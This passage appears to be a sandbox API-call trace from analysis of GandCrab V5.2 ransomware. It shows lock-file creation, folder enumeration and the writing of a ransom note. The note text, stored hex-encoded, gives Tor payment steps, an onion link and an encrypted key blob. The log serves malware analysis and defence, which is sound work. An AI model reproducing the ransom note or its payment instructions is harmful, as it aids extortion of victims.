x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0070.325] CloseHandle (hObject=0x2b4) returned 1 [0070.325] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.325] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.326] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x27d)) [0070.326] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.326] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.326] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.326] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.326] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0070.327] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.328] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.328] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\") returned 49 [0070.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*" [0070.328] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5036f8 [0070.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.328] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.328] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.328] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.328] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock" [0070.329] lstrlenW (lpString=".titwmvjl") returned 9 [0070.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.329] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.329] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 82 [0070.329] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\d2ca4a09d2ca4deb61a.lock") returned 73 [0070.329] lstrlenW (lpString=".lock") returned 5 [0070.329] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.329] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.329] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.329] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.329] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.329] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0070.329] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0070.329] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player" [0070.329] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0070.329] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.330] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.331] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.331] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\\\TITWMVJL-DECRYPT.txt") returned 83 [0070.331] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0070.333] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\